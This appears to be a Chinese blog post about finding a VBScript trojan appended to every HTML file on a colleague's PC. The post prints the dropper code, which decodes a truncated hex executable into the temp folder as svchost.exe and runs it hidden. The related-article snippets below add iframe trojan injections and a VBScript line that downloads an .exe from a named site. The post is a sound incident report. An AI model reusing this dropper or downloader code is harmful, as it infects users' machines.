同事发来的文件是个html,逮到一个疑是感染html,htm,网页文件的木马

最新推荐文章于 2024-06-20 13:02:02 发布
最新推荐文章于 2024-06-20 13:02:02 发布
阅读量447 收藏
点赞数
文章标签: 同事发来的文件是个html

事情是这样子的

远程帮同事搞进销存软件 ,发现软件打开不正常了

如图

102752yfmqgp6pt4ltgr96.jpg

"在此页上的ActiveX控件和本页上的其它部分的交互可能不安全“

我选择继续,是

如下图

103010xn09ltlu9ib5o5b0.png

“当前页面脚本发生错误。%1不是有效的win32应用程序。”

这里我要说一下的,IE浏览器我都是设置过的,正常情况下进入这个页面是不会有这两个提示的

我觉得哪里有猫腻,我按提示路径找到那个html文件,发现如下

104336naycddbdmdc5bs4b.png

在html文件尾部被添加了如下代码

[Visual Basic] 纯文本查看 复制代码

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000...........后面还有很多"

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath)=False Then

Set FileObj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step 2

FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

Next

FileObj.Close

End If

Set WSHshell = CreateObject("WScript.Shell")

WSHshell.Run DropPath, 0

//-->

用文本记事本打开一串字符,打开会乱码

105811zzzlc8ccalv66cqm.jpg

这个代码目的是什么吗?只感染一个软件 ?然后检查所有的html文件,

发现所有的html 网页文件全部被修改添加了 ,如图

105913bgnzblwtlht7bgnn.jpg

105916ujivqajmwdzwjomm.jpg

110001dz7wd99fefy30zme.jpg

全盘的文件无一幸免,我不懂编程,但知道这是VBS代码,应该有一段时间了的,本地安装了3X0全家桶的,但好像没有阻止

现在正在挂了一个Win 10 ,用Windows Defender 安全中心扫描中

110757nak7h21dhvj17v7a.jpg

微软自家产品还是可以的

论坛上也有类似的案例,前面我搜索了一下2015年时候就有类似案例的VBS木马(应该算木马)

我这边发帖子,分享整个问题发现的过程

laohu24.gif ,从软件打开异常,发现html网页有问题,第一次发帖子,来支持论坛

8141e8b3bff12788df7d902846dfe0de.gif

PS: 感觉国产杀毒软件(3X0,等不怎么靠谱)

105736dkfyavmfpm4t7za1.jpg

469629a2320730e8d5e903514442cf15.png

胖骁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rmnet蠕虫感染html文件赏析
yellow的博客
03-03 575
被rmnet蠕虫感染html文件赏析。
HTML文件中病毒,文件最下面附有<SCRIPT Language=VBScript><!-- DropFileName = “svchost.exe“
qq_44371321的博客
01-18 2356
HTML文件最后带有: <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A
html文本被木马病毒植入vbs脚本
最新发布
little_kid_pea的博客
06-20 422
还是只是在临时文件夹下创建一个名为svchost.exe的文件,windows系统也有一个同名的文件,而且是个重要的程序,给文件起这个名字显然是病毒做的伪装。然后会执行这个文件。我觉得vbs好可怕,居然可以在浏览器中操作文件系统,把他们的病毒程序植入本地文件系统并执行,vbs甚至可以不经用户同意删除文件,如果把windows的必要文件删了,windows系统直接死机启动不了。我在公司服务器上写了一个静态html,方便导航,结果没过多久发现html文件被修改了,在标签后加了这些代码。
所有的html文件都被感染了,电脑的所有HTML文件感染
weixin_34261380的博客
06-19 148
每个文件的最后面都有这样一串恶意代码:
360扫描出来html木马,你的电脑真的做好防护了吗?使用360安全卫士木马查杀一键扫描就知道...
weixin_29698641的博客
06-16 963
在如今的生活和工作中,电脑早已经是我们的左右手,但时间久了,电脑也会有状态不在线的时候,对我们的生活与工作造成一定影响。360安全卫士木马查杀在电脑病毒处理这一点上就做得很出色,也是很多人在电脑管理方面会选择的软件。360安全卫士比如在使用电脑的过程中,随着各种软件的下载安装,还有各种网站资料的浏览下载,在不知不觉中电脑就会遭到一些不明病毒的侵扰,这些病毒一旦入侵到电脑的重要程序,就会大量破坏电脑...
修复被vbs病毒感染html文件小工具(最新版)
11-16
支持多线程,支持指定修复,保留正常html,修复被vbs病毒感染html文件,保留正常代码,删除例如"[removed]<!-- DropFileName = "svchost.exe""这样的病毒代码
html文件都被感染,virus.html.cloud.1是什么病毒?网站备份被感染如何处理
weixin_42392689的博客
06-16 5109
virus.html.cloud.1是什么病毒?类型:virus.html.cloud.1描述:恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。前两天,对网站数据进行备份下载时,360杀毒查询到网站备份文件有virus.html.cloud.1病毒,后来在逐个盘查就是找不到病毒的位置,没其他的办法,只要把网站文件一个个进行查杀。最后居然在缓存文件里找到该...
蓝色风格视差滑动网站模板是一款单页HTML5网页模板下载.rar
09-10
7. **default.css** 和 **owl.theme.css**:这些可能是 Owl Carousel 插件的样式文件,Owl Carousel 是一个流行的jQuery轮播插件,用于创建滑动或旋转木马效果,常用于展示产品、图片或内容列表。 综上所述,这款...
C#判断上传文件是否是图片以防止木马上传的方法
12-30
很多时候木马程序会伪装成其他格式的文件上传到网站,最常见的如图片格式。本文就以C#为例讲述C#判断上传文件是否是图片以防止木马上传的方法,具体方法如下: 方法一:用image对象判断是否为图片 /// /// 判断...
HTML是网页制作者必须要学习掌握的
12-09
学会HTML语言的好处是什么?...7:可以向更高一层次进阶:DIV+CSS网页设计。8:看完这篇文章,接下来就可以修改本站提供的模板了。 用什么工具来学习HTML呢? 还是推荐大学使用Dreamweaver软件来学习HTML,Dreamweav
JavaScript_这是你需要的最后一个旋转木马.zip
05-21
"JavaScript_这是你需要的最后一个旋转木马.zip"这个压缩包文件很可能包含了一个JavaScript实现的旋转木马(Carousel)效果的代码示例或库。旋转木马通常用于展示一组图片或内容,用户可以前后滑动查看。这种效果...
赛门铁克杀html病毒,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
weixin_42144201的博客
06-20 971
参考:https://www.cnblogs.com/wuhairui/p/8297614.htmlhttp://www.guopingblog.com/post/100.html最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样DropFileName=“svchost.exe”WriteData=“4D5A000020000...
手机邮件打开一个html会中木马,小心,QQ邮件中的木马
weixin_32736961的博客
06-24 1673
小心,QQ邮件中的木马!文/图冰河洗剑最近,笔者的QQ邮箱中经常收到一些莫名其妙的邮件和贺卡,让你看一段视频了什么的,这只是垃圾邮件吗?每次笔者看到这些邮件,都毫不犹豫的将其删除,绝对不打开查看——因为,这些看似无关紧要的邮件中,很可能就夹带着木马!一、QQ邮箱漏洞与木马传播在新版的QQ邮箱中,存在着一个很严重的挂马漏洞,恶意攻击者可以在邮件中输入恶意代码,让其它用户中招后台下载运行木马。与一般...
VBS感染htm文件处理办法
qq_17859993的博客
03-02 214
先要了解这些脚本是那里来的? ①安装互联网上共享的系统镜像,比如系统之家等网站里的系统镜像。 ②安装了互联网上共享的“绿色软件”。 偏要装或者已经装了,怎么处理? ①基于刚刚安装的系统,卸载所有系统自动安装的浏览器、输入法、各种视频软件,最重要的是微软的办公软件,统统卸载。立即使用腾讯电脑管家(升级到最新版)全盘扫,扫完处理时,必须选择“立即删除”,新系统无所顾忌,非常容易判断这些感染型脚本。处理...
使用html链接上传木马,一段植入木马html代码
weixin_28465009的博客
06-09 2959
评论#re: 一段植入木马html代码2012-06-25 14:47往往v< html >< script language ="VBScript" >on error resume next' 即将下载的木马dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "' 创建OBJECT元素Set df = docume...
win7下 html页面iframe木马,HTML页面被iframe植入木马病毒(MetaBase.xml挂马)
weixin_31577315的博客
06-03 839
近期有租用服务器的客户出现页面被挂木马的情况,但是源文件中又找不到被挂木马那段iframe代码,一个客户是北京机房的,一个是美国机房的,由于服务器服务商基本上都是划分独立子网的,所以排除ARP攻击导致木马,经过派发发现在IIS的DefaultDocFooter被写入一个本地HTML文件,查看该文件源码,正是页面被挂上的木马病毒,现将远离总结一下。HTML页面被iframe植入木马病毒(MetaBa...
html代码大全(很全的)_分享一些比较强悍的PHP木马大全源码
weixin_39550172的博客
11-27 2390
由于PHP一句话木马可以说有很多,简单的、中等的、复杂的.......,今天主要是分享一些比较强悍的一些PHP一句话木马大全;一、利用404页面隐藏PHP小马<html><head><title>404 Not Foundtitle>head><body><h1>Not Foundh1><p>The...
各种网页木马挂马的代码
weixin_30852419的博客
10-03 447
1、嵌入网页 <iframe src="http://网页木马地址" width="0" height="0" border="0"></iframe> 2、PHP网页挂马 <iframe src=http://qq.82647495.com width=0 height=0></iframe> 3、图片木马 <html> <bod...
24小时轮播怎么实现的_js如何实现木马轮播图效果
weixin_39576066的博客
01-17 108
首先,我们来看一下木马轮播图效果:具体代码如下:(推荐教程:js教程)html部分代码: 旋转木马轮播图 在html部分引入的myStyle.css文件部分代码@charset "UTF-8"; blockquote,body,button,dd,dl,dt,fieldset,form,h1,h2,h3,h4, h5, h6, hr...
一个文件上传漏洞一句话木马
06-19
我不能提供关于创建或利用文件上传漏洞的任何指导,因为这种行为违反了网络安全规定和道德准则,可能导致未经授权的数据访问或系统破坏。安全专家强烈建议避免此类活动,而应该专注于学习并使用技术来保护系统免受攻击。 如果你对网络安全感兴趣,可以探索如何修补这些漏洞(如使用验证、过滤和输入 sanitization 等防御措施),或者学习如何防范和响应这类攻击。对于合法的安全研究,通常需要在受控的环境中,并遵守相关的法律和政策。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值